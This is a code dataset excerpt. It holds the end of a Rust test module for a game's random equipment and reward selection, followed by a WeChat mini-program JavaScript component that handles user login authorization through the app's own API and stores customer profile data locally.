fn downgrades_when_too_few() {
let mut ecs = World::new();
let equipments = EquipmentResource::init_with(&[
EquipmentItem::init("a", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
EquipmentItem::init("b", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
EquipmentItem::init("c", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
EquipmentItem::init("d", None, EquipmentKinds::Accessory, EquipmentRarity::Uncommon, &[EquipmentEffect::None]),
EquipmentItem::init("e", None, EquipmentKinds::Accessory, EquipmentRarity::Uncommon, &[EquipmentEffect::None]),
EquipmentItem::init("f", None, EquipmentKinds::Accessory, EquipmentRarity::Rare, &[EquipmentEffect::None]),
]);
let progression = ProgressionComponent::init(ProgressionState::init(0, 0, &["a"], CharacterWeaponKind::Gunslinger, Equipment::init_empty()));
ecs.insert(RandomComponent::init());
ecs.insert(progression);
ecs.insert(equipments);
for _ in 0..10 {
let chosen = get_random_items(
&ecs,
vec![(EquipmentRarity::Common, 2), (EquipmentRarity::Uncommon, 2), (EquipmentRarity::Rare, 2)],
);
assert_eq!(5, chosen.len());
assert!(chosen.iter().all(|c| c.name != "a"));
}
}
#[test]
fn too_few_total_items() {
let mut ecs = World::new();
let equipments = EquipmentResource::init_with(&[
EquipmentItem::init("a", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
EquipmentItem::init("b", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
EquipmentItem::init("c", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
]);
let progression = ProgressionComponent::init(ProgressionState::init(0, 0, &["a"], CharacterWeaponKind::Gunslinger, Equipment::init_empty()));
ecs.insert(RandomComponent::init());
ecs.insert(progression);
ecs.insert(equipments);
for _ in 0..10 {
let chosen = get_random_items(
&ecs,
vec![(EquipmentRarity::Common, 12), (EquipmentRarity::Uncommon, 2), (EquipmentRarity::Rare, 2)],
);
assert_eq!(2, chosen.len());
assert!(chosen.iter().all(|c| c.name != "a"));
}
}
#[test]
fn random_reward() {
let mut ecs = World::new();
ecs.insert(RandomComponent::init());
let request = get_reward_request(&ecs, 3);
assert_eq!(3, request.iter().map(|r| r.1).sum::<u32>());
}
}
| 43.147929 | 149 | 0.629868 | 3.171875 |
040e190e0368ecd734725045a8016a6c9dab78fc | 2,581 | js | JavaScript | components/author/author.js | linmujing/lvyingWeChat | 2fc8632b5bcee5d21196eee8eec54b1f5defa790 | [
"Apache-2.0"
] | null | null | null | components/author/author.js | linmujing/lvyingWeChat | 2fc8632b5bcee5d21196eee8eec54b1f5defa790 | [
"Apache-2.0"
] | null | null | null | components/author/author.js | linmujing/lvyingWeChat | 2fc8632b5bcee5d21196eee8eec54b1f5defa790 | [
"Apache-2.0"
] | null | null | null | // components/mydist/author.js
var app = getApp();
Component({
/**
* 组件的属性列表
*/
properties: {
},
/**
* 组件的初始数据
*/
data: {
// 组件显示
authorShow: true
},
ready(){
},
/**
* 组件的方法列表
*/
methods: {
// 获取用户信息
onGotUserInfo(res) {
console.log(res)
wx.showLoading({ title: '获取授权中...', mask: true })
let that = this;
// 小程序接口参数
let url = app.GO.api + 'wechat/login/mp/customer/userInfo';
let param = {
encryptedData: res.detail.encryptedData,
iv: res.detail.iv
};
//调用登录接口
wx.login({
success: function (res) {
// wx.showModal({
// title: '1',
// content: JSON.stringify(res),
// })
console.log(res)
param.code = res.code;
wx.request({
url: url,
method: 'get',
data: param,
success: function (res) {
// wx.showModal({
// title: '2',
// content: JSON.stringify(res),
// })
wx.hideLoading()
console.log(res.data)
let data = res.data;
if(data.code == 200){
wx.setStorageSync('recommend_customer_id', data.content.ciCode);
wx.setStorageSync('recommend_customer_name', data.content.ciName);
wx.setStorageSync('recommend_customer_phone', data.content.ciPhone);
wx.setStorageSync('recommend_customer_img', data.content.ciProfileUrl);
wx.setStorageSync('unionLongId', data.content.unionLongId);
//鉴权
app.GO.util.getStorageData(app);
wx.showToast({ title: '获取授权成功!' })
setTimeout(() => { wx.navigateBack() },500);
}else{
wx.showToast({ title: '获取授权失败!' , 'icon':'none'})
}
},
fail: function (err) {
// wx.showModal({
// title: '3',
// content: JSON.stringify(err),
// })
wx.hideLoading()
wx.showToast({ title: '获取授权失败,请重新检查网络是否正常!', icon: 'none' })
}
})
},
fail: function (res) {
// wx.showModal({
// title: '4',
// content: JSON.stringify(res),
// })
wx.hideLoading()
wx.showToast({ title: '获取授权失败,请重新检查网络是否正常!', icon: 'none' })
}
})
},
}
})
| 24.349057 | 88 | 0.444789 | 3.078125 |
Subsets and Splits